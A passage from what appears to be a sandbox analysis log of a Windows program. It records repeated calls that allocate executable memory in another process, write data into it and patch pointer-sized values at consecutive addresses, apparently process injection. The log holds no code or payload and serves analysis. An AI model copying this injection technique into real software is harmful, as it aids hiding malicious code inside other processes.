NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.438] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.438] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.438] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.439] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.439] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.439] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.439] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.439] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.439] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a118, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.439] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.439] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b0c*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b0c*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0140.439] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.439] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.440] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.440] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.440] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.440] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.440] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.440] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.440] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.440] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.441] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.441] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.441] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a120, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.441] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.441] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b1a*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b1a*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0140.441] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.441] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.442] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.442] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.442] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.442] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.442] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.443] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.443] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.443] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.443] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.443] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.443] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a128, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.443] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.444] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b2a*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b2a*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0140.444] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.444] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.444] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.444] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.444] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.445] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.445] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.445] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.445] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.445] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.445] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.445] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.446] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a130, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.446] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.446] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b40*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b40*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0140.446] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.446] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.446] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.447] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.447] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.447] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.447] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.447] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.447] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.447] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.447] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.447] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.448] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a138, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.448] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.448] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b56*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b56*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0140.448] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.448] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.448] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.448] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.449] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.449] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.449] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.449] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.449] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.449] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.449] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.449] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.450] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a140, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.450] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.450] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b5e*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b5e*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.450] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.450] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.450] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.450] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.451] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.451] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.451] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.451] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.451] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.451] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.451] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.451] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.451] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a148, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.452] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.452] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b70*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b70*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0140.452] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.452] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.452] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.452] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.452] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.452] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.453] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.453] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.453] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.453] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.453] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.453] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.453] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a150, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.453] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.453] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b80*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b80*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0140.454] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.454] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.454] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.454] NtWriteVirtualMemory (in: ProcessHandle=0x138, 